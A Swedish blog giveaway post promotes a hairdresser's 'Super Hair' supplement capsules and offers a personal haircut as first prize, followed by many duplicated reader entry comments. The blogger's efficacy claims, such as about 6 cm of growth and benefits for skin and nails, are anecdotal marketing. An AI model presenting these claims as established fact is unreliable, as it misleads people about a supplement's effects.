TÄVLINGEN du INTE vill missa! Vinn en personlig klippning av Bobby & månads förbrukning av Super Hair!

FullSizeRender Hej Fina! Nu ska vi förgylla helgen med TÄVLINGEN du inte får missa! 

Som du kanske redan vet har jag sedan ett par månader ätit Bobbys Superhair. I drygt 4 månader har jag själv provat och det har växt nästan 6cm! Plus att mina bebis-hår äntligen börjar ta form (Du vet dom där irritareande håren bak i nacken och framme under luggen )

Jag personligen är SUPER nöjd, glad och tacksam över detta! Jag har för första gången på 10 år valt att ta ur löshåret och låta det vara ett tag…..  Det känns underbart!  

Bobbys Super Hair har även fått respons som Sveriges bästa hårnäring. -Stort GRATTIS  till det Bobby <3

Dessutom är dom inte ”bara” bra för håret, utan även bra för hud och naglar! Vilket vi självklart inte tackar nej till 😉  Du kan läsa mer om produkten och även  beställa hem dom HÄR 

Nu har jag möjligheterna att göra så ni mina kära läsare kan få vinna dessa magiska närings kapslar som funkar för både hår, hud och naglar. Men inte ”bara” det 😉 

ALLA  som deltar kommer att få ut nåt bra av tävlingen, vad får ni veta senare…  😉

Första pris är en PERSONLIG klippning av min goda, vän, frisör och entreprenör Bobby!

 -Hur kul är inte det?! Den som vinner första pris kommer att få komma till Bobby i Stockholm och låta hans magiska händer få ta hand om DITT hår, dessutom får du med dig kapslar på plats i salongen. Plus att jag kikar förbi och säger hej, när du väl är där =) 

Så första Pris är alltså en personlig klippning av Bobby, kapslar och en kram ifrån mig. 

Sen vinner FEM stycken bloggläsare dessutom flera månaders förbrukning av Bobbys Super Hair. 

Vi gör det inte för komplicerat, det enda du behöver göra är att DELA detta inlägget på Facebook och lämna en kommentar och ditt namn här nedan….  Vinnaren publiceras om en vecka =) 
IMG_9424

Titta jag kan slänga med mitt egna hår 😉 

270816-MyMartens-HermanCaroan-0184Glöm inte…… Tävlar man inte, så vinner man inte! Så vad väntar du på?  -Sätt igång att TÄVLA nu!  

-LYCKA TILL! Kramar / My & Bobby! 

272 Komentarer

 1. Wow säger jag bara, vilken tävling. Tänk att få möjligheten att klippas av Bobby och dessutom få dessa magiska kapslar. Nu håller jag tummarna och hoppas på tur. Ha en trevlig helg och var rädd om dig , Lilleman och Sture✊

 2. Det vore en dröm att vinna den klippningen och kapslarna ?!!! Efter graviditet och amning som slitit otroligt mycket på mitt hår vore det så kul att få ta hand om sig själv igen! Håller tummarna ?!!!

 3. Maria Höglund heter jag och hur lyxigt vore inte det här, jag har nog aldrig varit på en salong för klippning
  vore toppen och kapslarna verkar super duper.
  M

 4. Åh behöver verkligen detta till mitt slitna hår… har lite långt till Stockholm, men jag är gärna en av de andra vinnarna, som vinner kapslar.. ?
  Tack o kram <3

 5. My du har en sådan jävla anamma som få du lägger inte dig och väntar på att allt går över, jag skulle väldigt gärna vinna och träffa dig/ Annika

 6. Har delat inlägget☺ Håller verkligen tummarna för en klippning☺ Klippte mig sist i Januari ? Är ganska snål på mig själv,lägger hellre pengarna på min son då man är ensamstående. Han kommer alltid först. Så de skulle vara underbart att få vinna en klippning av din kära vän☺ Hoppas innerligt på ? Kram Sandra.

 7. Vilken chans/dröm det skulle vara att få bli om pysslad av en av Sveriges hårkonstnärer,skulle verkligen behöva en ny frisyr, går runt med en fluffig bulle på huvudet eller alltid uppsatt hår. Vill verkligen ha ett ny tänk med mitt hår som är tunt o långt, tack för en peppande o inspirerande blogg med mycket känslor i, kram

 8. Ååå vad synd att alla tävlingar så gott som alltid ska delas på fb. Jag kan o vill inte ha ett konto där av olika orsaker. Men bli fantastiskt snygg i kalufsen skulle jag gärna bli o träffa dig förstås. Men jag får önska någon annan lycka till ?! Ha en skön lördagskväll!!

 9. Shit vad najs det vore men vinner jag så ger jag nog det till min älskade dotter som är värd detta trots att jag helst vill vinna själv.

 10. Tunnhårig med risiga toppar och med minst 10 cm utväxt skulle verkligen behöva en hel ”renovering” av håret ✂️. Håller ✊✊
  /Satu Malinen

 11. Wow säger jag bara, vilken tävling. Tänk att få möjligheten att klippas av Bobby och dessutom få dessa magiska kapslar. Nu håller jag tummarna och hoppas på tur. Ha en trevlig helg och var rädd om dig , Lilleman och Sture✊

 12. Det vore en dröm att vinna den klippningen och kapslarna :)!!! Efter graviditet och amning som slitit otroligt mycket på mitt hår vore det så kul att få ta hand om sig själv igen! Håller tummarna :)!!!

 13. Åhhh detta skulle vara något. Skulle verkligen behöva detta, då det tagit min frisör ca ett år att fixa mitt hemmafärgade hår ? och det är ännu inte bra.Hoppas, hoppas, HOPPAS att jag vinner detta. Jag önskar dig en bra höst. // Sara Karlsson

 14. Maria Höglund heter jag och hur lyxigt vore inte det här, jag har nog aldrig varit på en salong för klippning
  vore toppen och kapslarna verkar super duper.
  M

 15. Åh behöver verkligen detta till mitt slitna hår… har lite långt till Stockholm, men jag är gärna en av de andra vinnarna, som vinner kapslar.. 🙂

  Tack o kram <3

 16. Wow vilken tävling o vilka priser <3
  Skulle vara en gudomlig vinst för just nu blir jag nästan rädd för mig själv när jag möter min spegelbild. Tänk att få ha en mästare händer o sax i håret och som grädde på moset att du tittar förbi.
  Kram

 17. Håller verkligen tummar och tår för den här vinsten. Svårt att lita på frisörer då jag i ungdomen blev klippt verkligen jättefel och inte alls som jag sa. Sitter sedan dess på helspänn varenda gång jag går till frisören och det resulterar också i att jag går otroligt sällan. Vore skönt med en Stockholmsresa, med ett proffs som fixar håret på mig samt en kram till dig du starka kvinna

 18. My du har en sådan jävla anamma som få du lägger inte dig och väntar på att allt går över, jag skulle väldigt gärna vinna och träffa dig/ Annika

 19. Känns så lyxigt men lite avlägset, skriver nästan aldrig om min sjukdom vill inte att någon ska tycka synd om mig…men det hör skulle kanske hjälpa mig att få igång mitt hår igen då 6 månaders cellgifter har satt sina spår, att sen när håret vuxit ut ha en klippning hos fina Bobby är verkligen något att se fram emot…..tack så mycket för fin
  tävling!!! ❤

 20. Har delat inlägget☺ Håller verkligen tummarna för en klippning☺ Klippte mig sist i Januari 🙁 Är ganska snål på mig själv,lägger hellre pengarna på min son då man är ensamstående. Han kommer alltid först. Så de skulle vara underbart att få vinna en klippning av din kära vän☺ Hoppas innerligt på 🍀 Kram Sandra.

 21. Vilken chans/dröm det skulle vara att få bli om pysslad av en av Sveriges hårkonstnärer,skulle verkligen behöva en ny frisyr, går runt med en fluffig bulle på huvudet eller alltid uppsatt hår. Vill verkligen ha ett ny tänk med mitt hår som är tunt o långt, tack för en peppande o inspirerande blogg med mycket känslor i, kram

 22. Ååå vad synd att alla tävlingar så gott som alltid ska delas på fb. Jag kan o vill inte ha ett konto där av olika orsaker. Men bli fantastiskt snygg i kalufsen skulle jag gärna bli o träffa dig förstås. Men jag får önska någon annan lycka till 😊! Ha en skön lördagskväll!!

 23. Shit vad najs det vore men vinner jag så ger jag nog det till min älskade dotter som är värd detta trots att jag helst vill vinna själv.

 24. Tunnhårig med risiga toppar och med minst 10 cm utväxt skulle verkligen behöva en hel ”renovering” av håret ✂️. Håller ✊✊
  /Satu Malinen

 25. Skulle oxå vilja slänga mitt löshår men för att kunna göra det måste jag få träffa Bobby … Jag håller tummarna att jag vinner?

 26. Delat på facebook. Detta vore ju rena drömmen för mig som aldrig annars uppsöker frisör, vore så himla overkligt lyxigt att jag inte ens kan föreställa mig att sitta där med Bobbys magiska saxar och händer i mitt trassliga hår ?

 27. Vilken tävling My!
  Har haft långt hår hela livet men funderat länge på att göra nåt nytt. Har dock inte vågat hittills… Men Bobby skulle gärna få sätta proffsfingrar och sax i det! Kram

 28. Självklart är jag med och tävlar om detta otroliga pris att vinna!!!! Vilken grym känsla det skulle vara att få Bobbys händer i håret plus att få träffa dig My ?

 29. Delat inlägget och kommenterar här. Håller nu tummarna för att just jag ska vinna å få bli riktigt snygg i håret av en frisör jag länge drömt om att få gå till.

 30. Delat! som småbarnsförälder, hästar och mycket jobb är håret inget som prioriterats. Var nog ett år sedan det klipptes. Så skulle verkligen vara helt underbart att få möjligheten att få det fixat av självaste Bobby ? Och kapslarna vore verkligen toppen att få prova! Håller tummarna för att det är min tur att vinna!

 31. Åhhh detta skulle vara något. Skulle verkligen behöva detta, då det tagit min frisör ca ett år att fixa mitt hemmafärgade hår 🙁 och det är ännu inte bra.Hoppas, hoppas, HOPPAS att jag vinner detta. Jag önskar dig en bra höst. // Sara Karlsson

 32. Wow vilken tävling o vilka priser <3
  Skulle vara en gudomlig vinst för just nu blir jag nästan rädd för mig själv när jag möter min spegelbild. Tänk att få ha en mästare händer o sax i håret och som grädde på moset att du tittar förbi.
  Kram

 33. Håller verkligen tummar och tår för den här vinsten. Svårt att lita på frisörer då jag i ungdomen blev klippt verkligen jättefel och inte alls som jag sa. Sitter sedan dess på helspänn varenda gång jag går till frisören och det resulterar också i att jag går otroligt sällan. Vore skönt med en Stockholmsresa, med ett proffs som fixar håret på mig samt en kram till dig du starka kvinna

 34. Känns så lyxigt men lite avlägset, skriver nästan aldrig om min sjukdom vill inte att någon ska tycka synd om mig…men det hör skulle kanske hjälpa mig att få igång mitt hår igen då 6 månaders cellgifter har satt sina spår, att sen när håret vuxit ut ha en klippning hos fina Bobby är verkligen något att se fram emot…..tack så mycket för fin
  tävling!!! ❤

 35. Åhh, så mycket mitt hår gått igenom efter alla mina nycker med färg o löshår, SOM jag (mitt hår) skulle behöva detta. Hoppas innerligt och håller tummarna ✊?✊? /Camilla

 36. Skulle oxå vilja slänga mitt löshår men för att kunna göra det måste jag få träffa Bobby … Jag håller tummarna att jag vinner😄

 37. Delat på facebook. Detta vore ju rena drömmen för mig som aldrig annars uppsöker frisör, vore så himla overkligt lyxigt att jag inte ens kan föreställa mig att sitta där med Bobbys magiska saxar och händer i mitt trassliga hår 🙈

 38. Vilken tävling My!
  Har haft långt hår hela livet men funderat länge på att göra nåt nytt. Har dock inte vågat hittills… Men Bobby skulle gärna få sätta proffsfingrar och sax i det! Kram

 39. Självklart är jag med och tävlar om detta otroliga pris att vinna!!!! Vilken grym känsla det skulle vara att få Bobbys händer i håret plus att få träffa dig My 🙂

 40. Delat inlägget och kommenterar här. Håller nu tummarna för att just jag ska vinna å få bli riktigt snygg i håret av en frisör jag länge drömt om att få gå till.

 41. Delat! som småbarnsförälder, hästar och mycket jobb är håret inget som prioriterats. Var nog ett år sedan det klipptes. Så skulle verkligen vara helt underbart att få möjligheten att få det fixat av självaste Bobby 😍 Och kapslarna vore verkligen toppen att få prova! Håller tummarna för att det är min tur att vinna!

 42. Åhh, så mycket mitt hår gått igenom efter alla mina nycker med färg o löshår, SOM jag (mitt hår) skulle behöva detta. Hoppas innerligt och håller tummarna ✊🏻✊🏻 /Camilla

 43. Bor för långt bort för en klippning av bobby men de vore riktigt trevligt att få testa hans hårprodukt. Typiskt skandinaviskt hår med tunn strån behöver lite proffs hjälp! Ann-Louise

 44. Efter graviditeten är mitt hår super risigt o torrt och jag har haft samma frisyr i år nu så en liten make over hade inte suttit fel:)
  Tack fina för en fin blogg!

 45. Åh vill vinna! Har kämpat med att spara ut håret senaste 4 åren, och det börjar äntligen hända något så att vinna dessa kapslar skulle vara otroligt! Vill göra mig höstfin och inte vara lika blond längre, och det får Bobby gärna fixa ? En bonus att träffa dig också My, då jag läst din blogg sen du var med i ensam mamma söker!!!

 46. Hej!
  Spännande tävling ?
  Har delat på FB och håller tummarna, en tripp till huvudstaden är alltid trevligt ??
  //Camilla

 47. Bor för långt bort för en klippning av bobby men de vore riktigt trevligt att få testa hans hårprodukt. Typiskt skandinaviskt hår med tunn strån behöver lite proffs hjälp! Ann-Louise

 48. Lycka till alla ni som gjort vad man sig bör. Hoppas rätt person nu vinner.
  Själv kan jag inte då jag inte har facebook, instagram eller vad allt nu kallas. En gammal enuck typ.
  Lycka till alla och hoppas den som vinner blir riktigt fin i håret.

 49. Efter graviditeten är mitt hår super risigt o torrt och jag har haft samma frisyr i år nu så en liten make over hade inte suttit fel:)
  Tack fina för en fin blogg!

 50. Åh vill vinna! Har kämpat med att spara ut håret senaste 4 åren, och det börjar äntligen hända något så att vinna dessa kapslar skulle vara otroligt! Vill göra mig höstfin och inte vara lika blond längre, och det får Bobby gärna fixa 😉 En bonus att träffa dig också My, då jag läst din blogg sen du var med i ensam mamma söker!!!

 51. Tyvärr kan jag inte dela då jag inte har Facebook.men gör ett inlägg ändå?Till skillnad mot många här inne har jag redan en tjock hår som är extremt långt också ,men jag vill klippa av det ca 40cm och skänka till Cancerfonden för peruktillverkning,men har inte hittat någon frisör som tilltalar mig ännu,hoppas på bobby?Helena

 52. Hej!
  Spännande tävling 😄
  Har delat på FB och håller tummarna, en tripp till huvudstaden är alltid trevligt 👍🏼
  //Camilla

 53. Eftersom jag har frisör skräck Har detta resulterat i att jag inte varit hos frisören på 7 år. Å efter hemma färgning har nu håret slutat växa. Så dags för en förändring ?

 54. Detta trött slitna mamma håret skulle verkligen behöva få sig en omgång och de skulle va huuuur kul som hellst att få bli fin av Bobby! Han e ju sååå duktig! Delar och håller tummarna ?

 55. Lycka till alla ni som gjort vad man sig bör. Hoppas rätt person nu vinner.

  Själv kan jag inte då jag inte har facebook, instagram eller vad allt nu kallas. En gammal enuck typ.

  Lycka till alla och hoppas den som vinner blir riktigt fin i håret.

 56. Hade varit en dröm o verkligen behövligt då mitt hår är väldigt slitet o växer extremt sakta
  En förnyelse för en ny start av mitt liv

 57. Tyvärr kan jag inte dela då jag inte har Facebook.men gör ett inlägg ändå😜Till skillnad mot många här inne har jag redan en tjock hår som är extremt långt också ,men jag vill klippa av det ca 40cm och skänka till Cancerfonden för peruktillverkning,men har inte hittat någon frisör som tilltalar mig ännu,hoppas på bobby😉Helena

 58. Åhhh skulle så gärna vilja vinna för då skulle jag ge vinsten till min 20 åriga dotter som varit sjuk en längre tid o hon skulle behöva få lite lyx o bli ompysslad ett proffs!! Tack för en fin blogg. Kramisar Helena

 59. Eftersom jag har frisör skräck Har detta resulterat i att jag inte varit hos frisören på 7 år. Å efter hemma färgning har nu håret slutat växa. Så dags för en förändring 🤗

 60. Detta trött slitna mamma håret skulle verkligen behöva få sig en omgång och de skulle va huuuur kul som hellst att få bli fin av Bobby! Han e ju sååå duktig! Delar och håller tummarna 😊

 61. Åh hå <3 Jag skulle så badly behöva en genomgång ? Har haft full rulle med en kämpig graviditet (mao allt annat än att måbra har fått halka efter) och nu är bebis 5 månader och jag har FORFARANDE inte kommit iväg, detta skulle vara den spark i röven jag verkligen skulle behöva. Känslan att få lite egen vård och dessutom få känna sig fin igen skulle vara Amazing.

 62. WOW vilken Drömvinst, jag skulle så gärna vilja vinna de och ge de till min dotter Liza som är nyinflyttad i Stockholm…
  Hon har svårt o hitta en bra frisör så det vore galet härligt om hon fick den här vinsten…
  Hönsmamma som hoppas på tur…kram från mig Maria B

 63. Hej My !! Vill så gärna!!! 2sv tre barn har flyttat hemifrån , värre än jag trodde det skulle bli , snyft ?. Skulle så behöva bli lite upplivad. En klippning av Bobby , ingen skulle bli gladare än jag❤️

 64. Hade varit en dröm o verkligen behövligt då mitt hår är väldigt slitet o växer extremt sakta
  En förnyelse för en ny start av mitt liv

 65. Vad kostar en klippning hos honom? Ser han på ansiktet vad man passar bäst i?
  Jag är inte med i tävlingen men hoppas du svarar på frågorna.
  Ha en trevlig söndag.

  • Vad en klippning kostar beror nog på behandling. Den infon får man via honom vid en personlig konsultation =) Om han ser på ansiktet vad man passar bäst i? Ja du… det var en fråga med många breda svar. MIN objektiva bedömning är följande. Vad man passar bäst i ligger ju i betraktaren öga. Det som du tycker jag passar bäst i kanske inte jag tycker. tex….. Men MIN erfarenhet av Bobby är att han ett grymt öga för just det, han ser snabbt både vilken färg och form man passar bra i. Bobby har över 20 års erfarenhet inom branchen, och brinner för det han gör. Så jag kan lova dig att han är grym! Hoppas du fick svar på dom frågorna du ville ha. Med vänlig hälsning,

 66. Åhhh skulle så gärna vilja vinna för då skulle jag ge vinsten till min 20 åriga dotter som varit sjuk en längre tid o hon skulle behöva få lite lyx o bli ompysslad ett proffs!! Tack för en fin blogg. Kramisar Helena

 67. Åh om jag vinner så skulle jag klippningen till min son på 10 år som kämpar dagligen med både skola kompisar och även vuxna han har ADHD och han blir missförståd dagligen så en klippning hos MrB skulle göra honom gott❤️
  Så en klippning till sonen och lite piller till mamma blir perfekt?
  I mina ögon är han redan en vinnare en kämpe och en krigare då han fixar allt så skulle vi inte vinna så hänger vi inte läpp för de utan säger redan nu grattis till vinnaren❤️

 68. har ju sett hur snygg du blev i håret. Såklart blir man inspirerad. har ingen fast frisör. Klipper topparna mest. Dessa frisörer har väl inte den digniteten att göra underverk heller.
  Jag skulle önska mig en mer trendig frisyr. Lite mer edge. Har väl din längd ungefär. Sist fick jag lugg. herregud. Jag såg ut som en ponny.
  Sedan har jag blivit tipsad om silica. Har inget köpt ännu. Men när jag läste om kapslarna blev jag övertygad. Har oxå babyhår i nacke och under ”luggen” Trodde att det var bra. Att mer hår var på väg, hihih. sedan har jag märkt att håret vissnar i perioder då man är sjuk. sedan lyser det igen. Så det kan ju inte ha med hårets växande att göra
  att åka till huvudstaden kunde vara skoj. Har lite bloggkompisar, som jag aldrig träffat i verkligheten. Träffa dem i min nya fab frisyr. sminkat mig lite och så.
  Men det kanske jag gör ändå. Blev riktigt sugen nu.
  Lite frågor av den intresserade:
  – har du naturliga lockar? i så fall lucky you.
  – Du säger Bobbys kapslar. står han bakom dem, eller är han återfösäljare?
  Lär nog beställa dem. Redovisa på bloggen.
  kramis och kanske en in real life kramis

 69. Hoppar på varje tävling om klippning hos Bobby och hoppas varje gång. Tyvärr har jag ännu inte lyckats men håller tummarna ännu hårdare denna gång.
  Jag har gått hos Bobby i många år och han är den enda frisören någonsin som kunnat hantera och klippa mitt extremt krångliga hår.
  Pga förändrat liv och svårigheter har jag inte kunnat gå till honom på flera år och fått bort prioritera mig själv alltför länge ?
  Nu hoppas jag att min tur äntligen vänder.
  Paulette

 70. Åh hå <3 Jag skulle så badly behöva en genomgång 😉 Har haft full rulle med en kämpig graviditet (mao allt annat än att måbra har fått halka efter) och nu är bebis 5 månader och jag har FORFARANDE inte kommit iväg, detta skulle vara den spark i röven jag verkligen skulle behöva. Känslan att få lite egen vård och dessutom få känna sig fin igen skulle vara Amazing.

 71. WOW vilken Drömvinst, jag skulle så gärna vilja vinna de och ge de till min dotter Liza som är nyinflyttad i Stockholm…
  Hon har svårt o hitta en bra frisör så det vore galet härligt om hon fick den här vinsten…

  Hönsmamma som hoppas på tur…kram från mig Maria B

 72. Hej My !! Vill så gärna!!! 2sv tre barn har flyttat hemifrån , värre än jag trodde det skulle bli , snyft 😞. Skulle så behöva bli lite upplivad. En klippning av Bobby , ingen skulle bli gladare än jag❤️

 73. Vad kostar en klippning hos honom? Ser han på ansiktet vad man passar bäst i?
  Jag är inte med i tävlingen men hoppas du svarar på frågorna.

  Ha en trevlig söndag.

  • Vad en klippning kostar beror nog på behandling. Den infon får man via honom vid en personlig konsultation =) Om han ser på ansiktet vad man passar bäst i? Ja du… det var en fråga med många breda svar. MIN objektiva bedömning är följande. Vad man passar bäst i ligger ju i betraktaren öga. Det som du tycker jag passar bäst i kanske inte jag tycker. tex….. Men MIN erfarenhet av Bobby är att han ett grymt öga för just det, han ser snabbt både vilken färg och form man passar bra i. Bobby har över 20 års erfarenhet inom branchen, och brinner för det han gör. Så jag kan lova dig att han är grym! Hoppas du fick svar på dom frågorna du ville ha. Med vänlig hälsning,

 74. Åh om jag vinner så skulle jag klippningen till min son på 10 år som kämpar dagligen med både skola kompisar och även vuxna han har ADHD och han blir missförståd dagligen så en klippning hos MrB skulle göra honom gott❤️
  Så en klippning till sonen och lite piller till mamma blir perfekt👍
  I mina ögon är han redan en vinnare en kämpe och en krigare då han fixar allt så skulle vi inte vinna så hänger vi inte läpp för de utan säger redan nu grattis till vinnaren❤️

 75. har ju sett hur snygg du blev i håret. Såklart blir man inspirerad. har ingen fast frisör. Klipper topparna mest. Dessa frisörer har väl inte den digniteten att göra underverk heller.
  Jag skulle önska mig en mer trendig frisyr. Lite mer edge. Har väl din längd ungefär. Sist fick jag lugg. herregud. Jag såg ut som en ponny.
  Sedan har jag blivit tipsad om silica. Har inget köpt ännu. Men när jag läste om kapslarna blev jag övertygad. Har oxå babyhår i nacke och under ”luggen” Trodde att det var bra. Att mer hår var på väg, hihih. sedan har jag märkt att håret vissnar i perioder då man är sjuk. sedan lyser det igen. Så det kan ju inte ha med hårets växande att göra
  att åka till huvudstaden kunde vara skoj. Har lite bloggkompisar, som jag aldrig träffat i verkligheten. Träffa dem i min nya fab frisyr. sminkat mig lite och så.
  Men det kanske jag gör ändå. Blev riktigt sugen nu.
  Lite frågor av den intresserade:
  – har du naturliga lockar? i så fall lucky you.
  – Du säger Bobbys kapslar. står han bakom dem, eller är han återfösäljare?

  Lär nog beställa dem. Redovisa på bloggen.
  kramis och kanske en in real life kramis

 76. Hoppar på varje tävling om klippning hos Bobby och hoppas varje gång. Tyvärr har jag ännu inte lyckats men håller tummarna ännu hårdare denna gång.
  Jag har gått hos Bobby i många år och han är den enda frisören någonsin som kunnat hantera och klippa mitt extremt krångliga hår.
  Pga förändrat liv och svårigheter har jag inte kunnat gå till honom på flera år och fått bort prioritera mig själv alltför länge 🙁
  Nu hoppas jag att min tur äntligen vänder.

  Paulette

 77. Wow vilken tävling!! Den här vore ju rena drömmen att vinna dock skulle jag ge priset till min dotter. Hennes hår har av ngn anledning blivit jätte tunt och växer inta alls lika bra som förr. Om dessa ” piller” funkar som du säger skulle både hon och jag bli nöjda och en klippning hos en proffs frisör är ju bars en bonus. Håller nu tummar och tår, kram och tack för en härlig och ärlig blogg/ Ulrika

 78. Jag skulle behöva någon mirakelkur till mitt torra hår och extra bonus om det hjälper mot mina naglar som bara skivar sig!!
  Delar inlägget och håller tummarna.
  Du är superfin i håret med ditt naturliga!!
  Kram Johanna

 79. Oj, herregud tänk om jag vann!
  Det vore en härlig dröm som blev sann.
  För två ynka dagar sen fyllde jag 40 och tant.
  Fast jag känner mig inte sån, det är sant.
  Fast när jag står framför spegeln och trots att jag kisar.
  Så är det bilden av en tant som spegeln visar.
  Jag är trött och sliten. Mamma åt fyra.
  Vill känna mig vacker och bli pigg som en myra.
  Att få en klippning av en sådan fantastisk frisör,
  skulle verkligen få mig på toppenhumör.
  Jag önskar desperat att vinsten blir min!
  Att drömmen min ska slå in!
  Hoppas hoppas hoppas!!

 80. Wow vilken tävling!! Den här vore ju rena drömmen att vinna dock skulle jag ge priset till min dotter. Hennes hår har av ngn anledning blivit jätte tunt och växer inta alls lika bra som förr. Om dessa ” piller” funkar som du säger skulle både hon och jag bli nöjda och en klippning hos en proffs frisör är ju bars en bonus. Håller nu tummar och tår, kram och tack för en härlig och ärlig blogg/ Ulrika

 81. Åh jag som funderat att köpa dem ?. Håller ✊✊ att jag kan vinna dem istället???. Skulle även behöva bli lite snygg i höstmörkret ???✌??✂

 82. Delat på FB!
  Min käre make sa idag att jag såg ut som en ovårdad afghanhund.
  Var nog en bra sammanfattning på hur mitt hår ser ut just nu ?

 83. Det vore underbart att få vinna, all vardagsstress och allt fokus på barnen gör att det är svårt att hinna lyxa till det för en själv ibland. Skulle njuta av att någon pysslade om en, fick håret att få liv igen och verkligen någon som kan se vilken frisyr som passar, kanske dags för en ändring. ?
  Jag har ingen bättre motivering än så, jag önskar bara att få stanna upp en stund och njuta ?

 84. Hej! Mitt namn är Amanda Nordgren, jag är en tjej på 19 år som har ett fruktansvärt slitet, livlöst & tråkigt blont hår.
  Jag har sedan ungefär 6 år tillbaka burit löshår som inte ser speciellt bra ut, vilket jag, precis som du, mer än gärna skulle vilja bli av med. Min dröm är just det – Att kunna känna mig stolt och bekväm med mitt egna hår.
  Och jag är mer än beredd att låta den otroligt duktiga och helt fantastiska Bobby ta sig an det uppdraget, jag är så säker på att han är frisören som kan förverkliga min dröm. Dessutom behöver jag mest troligt några månaders Bobby’s superhair och en kram av dig My som pricken över i:et.
  Jag håller både tummar & tår nu att bli en vinnare! Det skulle betyda så mycket! Kram

 85. Jag skulle behöva någon mirakelkur till mitt torra hår och extra bonus om det hjälper mot mina naglar som bara skivar sig!!
  Delar inlägget och håller tummarna.

  Du är superfin i håret med ditt naturliga!!

  Kram Johanna

 86. Gillat och delat! Hoppas på tur, med ett hår som även ger min frisör gråa hår hoppas jag på en kur med Bobbys tabletter. Kanske kan de göra underverk på även min risbuske ?.

 87. Oj, herregud tänk om jag vann!
  Det vore en härlig dröm som blev sann.
  För två ynka dagar sen fyllde jag 40 och tant.
  Fast jag känner mig inte sån, det är sant.
  Fast när jag står framför spegeln och trots att jag kisar.
  Så är det bilden av en tant som spegeln visar.
  Jag är trött och sliten. Mamma åt fyra.
  Vill känna mig vacker och bli pigg som en myra.
  Att få en klippning av en sådan fantastisk frisör,
  skulle verkligen få mig på toppenhumör.
  Jag önskar desperat att vinsten blir min!
  Att drömmen min ska slå in!
  Hoppas hoppas hoppas!!

 88. Åh jag hoppas att jag vinner 1 månad med bobbys super tabletter.
  Skulle verkligen behöva det. Mitt tunna stripigt hår och naglar behöver boost.
  Håller tummarna

 89. Åh jag som funderat att köpa dem 🙊. Håller ✊✊ att jag kan vinna dem istället🍀🍀🍀. Skulle även behöva bli lite snygg i höstmörkret 💇👱💆✌😆🙄✂

 90. Delat på FB!
  Min käre make sa idag att jag såg ut som en ovårdad afghanhund.
  Var nog en bra sammanfattning på hur mitt hår ser ut just nu 🙂

 91. De skulle vara nåt för mig som haft samma frisör i 30 år?? men det tyder ju på att jag varit nöjd förstås men kanske dax att prova nån annan. Hoppas på tur hälsar Camilla

 92. Det vore underbart att få vinna, all vardagsstress och allt fokus på barnen gör att det är svårt att hinna lyxa till det för en själv ibland. Skulle njuta av att någon pysslade om en, fick håret att få liv igen och verkligen någon som kan se vilken frisyr som passar, kanske dags för en ändring. 🙂
  Jag har ingen bättre motivering än så, jag önskar bara att få stanna upp en stund och njuta 🙂

 93. Hej! Mitt namn är Amanda Nordgren, jag är en tjej på 19 år som har ett fruktansvärt slitet, livlöst & tråkigt blont hår.
  Jag har sedan ungefär 6 år tillbaka burit löshår som inte ser speciellt bra ut, vilket jag, precis som du, mer än gärna skulle vilja bli av med. Min dröm är just det – Att kunna känna mig stolt och bekväm med mitt egna hår.
  Och jag är mer än beredd att låta den otroligt duktiga och helt fantastiska Bobby ta sig an det uppdraget, jag är så säker på att han är frisören som kan förverkliga min dröm. Dessutom behöver jag mest troligt några månaders Bobby’s superhair och en kram av dig My som pricken över i:et.
  Jag håller både tummar & tår nu att bli en vinnare! Det skulle betyda så mycket! Kram

 94. Efter att ha ätit en massa mediciner så har min hårmängd halverats och jag tappar mycket hår och är faktiskt riktigt tunnhårig! Varenda gång jag ser mig i spegeln påminns man eller om man går till en okänslig frisör som kan säga det på ett burdust vis, jag vet jag vet.. Vilken ära det skulle vara att få komma till en frisör som vet vad han sysslar med. Bor en bra bit ifrån men jag är beredd att åka =)
  Nu håller jag tummarna hårt och ett nytt hopp har tänts inom mig =)

 95. Mitt eget hår är sååå tunt och kasst, kanske efter att använt extensions ett tag nu??
  Näring för att förbättra det vore toppen!!

 96. Gillat och delat! Hoppas på tur, med ett hår som även ger min frisör gråa hår hoppas jag på en kur med Bobbys tabletter. Kanske kan de göra underverk på även min risbuske 😄.

 97. Åh jag hoppas att jag vinner 1 månad med bobbys super tabletter.
  Skulle verkligen behöva det. Mitt tunna stripigt hår och naglar behöver boost.
  Håller tummarna

 98. De skulle vara nåt för mig som haft samma frisör i 30 år🙈🙈 men det tyder ju på att jag varit nöjd förstås men kanske dax att prova nån annan. Hoppas på tur hälsar Camilla

 99. Efter att ha ätit en massa mediciner så har min hårmängd halverats och jag tappar mycket hår och är faktiskt riktigt tunnhårig! Varenda gång jag ser mig i spegeln påminns man eller om man går till en okänslig frisör som kan säga det på ett burdust vis, jag vet jag vet.. Vilken ära det skulle vara att få komma till en frisör som vet vad han sysslar med. Bor en bra bit ifrån men jag är beredd att åka =)
  Nu håller jag tummarna hårt och ett nytt hopp har tänts inom mig =)

 100. Mitt eget hår är sååå tunt och kasst, kanske efter att använt extensions ett tag nu??
  Näring för att förbättra det vore toppen!!

 101. Delat ? Håller tummarna! Tappade massa hår förra sommaren och det har inte hämtat sig än ? Du är så sjukt snygg i håret nu så skulle ju vara drömmen att få testa kapslarna och låta Bobby lägga vantarna på min blonda kalufs ?

 102. Delat 😊 Håller tummarna! Tappade massa hår förra sommaren och det har inte hämtat sig än 😟 Du är så sjukt snygg i håret nu så skulle ju vara drömmen att få testa kapslarna och låta Bobby lägga vantarna på min blonda kalufs 😁

 103. Vad häftigt det skulle vara att bli klippt av en super duktig frisör. Dessutom skulle mitt hår jubla av kapslarna. Jag håller mina tummar. ?

 104. Vad häftigt det skulle vara att bli klippt av en super duktig frisör. Dessutom skulle mitt hår jubla av kapslarna. Jag håller mina tummar. 🙂

 105. Efter flera år med extentions är mitt hår trist o kortare än jag önskar
  Skulle verkligen bli glad över denna vinst o fix av håret!
  Delar ✨☺️ Och håller tummarna

 106. Åh detta vore magiskt! Mitt hår har rasat efter förlossning och amning. Bara bebishår kvar intill luggen. Håller mina tummar!! ?

 107. Efter flera år med extentions är mitt hår trist o kortare än jag önskar
  Skulle verkligen bli glad över denna vinst o fix av håret!
  Delar ✨☺️ Och håller tummarna

 108. Åh vilket lycka att få klippa håret! Efter graviditet och nu mammaledighet med amning så ser håret ut som det gör.. Så jag håller tummarna stenhårt ? //Angelica

 109. Åh detta vore magiskt! Mitt hår har rasat efter förlossning och amning. Bara bebishår kvar intill luggen. Håller mina tummar!! 🙂

 110. Åh vilket lycka att få klippa håret! Efter graviditet och nu mammaledighet med amning så ser håret ut som det gör.. Så jag håller tummarna stenhårt 😍 //Angelica

